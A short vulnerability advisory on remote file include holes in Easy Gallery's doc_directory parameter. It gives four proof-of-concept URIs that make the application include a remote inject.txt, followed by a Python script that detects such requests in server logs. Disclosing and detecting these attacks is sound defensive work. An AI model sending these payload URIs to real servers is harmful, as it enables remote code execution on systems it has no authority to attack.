
Easy Gallery Doc_Directory Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://www.example.com/inject.txt?
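
To check web server logs for requests of this shape, the following added example (not part of the original advisory or of Easy Gallery) flags requests to the four listed scripts whose doc_directory value points at a remote location, including percent-encoded forms. The combined log format, the /gallery install path, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts named in the advisory's proof-of-concept URIs.
AFFECTED = (
    "/sw/lib_user/find_user.php",
    "/sw/lib_user/user.php",
    "/sw/lib_comment/comment.php",
    "/sw/lib_session/session.php",
)
# A value starting with a URL scheme (or //host) points outside the local tree.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request line inside a combined-log-format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2009:10:01:02 +0000] "GET /gallery/sw/lib_user/user.php?doc_directory=http://www.example.com/inject.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2009:10:01:05 +0000] "GET /gallery/sw/lib_comment/comment.php?doc_directory=hTTp%3A%2F%2Fwww.example.com%2Finject.txt%3F HTTP/1.1" 200 498',
    '198.51.100.4 - - [12/Mar/2009:10:02:00 +0000] "GET /gallery/sw/lib_user/user.php?id=4 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/Mar/2009:10:02:09 +0000] "GET /gallery/index.php?doc_directory=http://www.example.com/x HTTP/1.1" 404 0',
]


def suspicious(line):
    """Return (script, value) for a remote doc_directory on an affected script, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = next((s for s in AFFECTED if url.path.lower().endswith(s)), None)
    if script is None:
        return None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() == "doc_directory" and REMOTE.match(value):
            return script, value
    return None


def scan(lines):
    """Return [(line_number, (script, value)), ...] for every flagged line."""
    return [(i, hit) for i, line in enumerate(lines, 1) if (hit := suspicious(line))]


if __name__ == "__main__":
    for n, (script, value) in scan(SAMPLE_LOG):
        print(f"line {n}: {script} doc_directory={value!r}")
```

A hit shows only that such a request was made; the response status and any outbound fetches from the web server around the same time indicate whether the include succeeded.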







 

Copyright 2009, SecurityFocus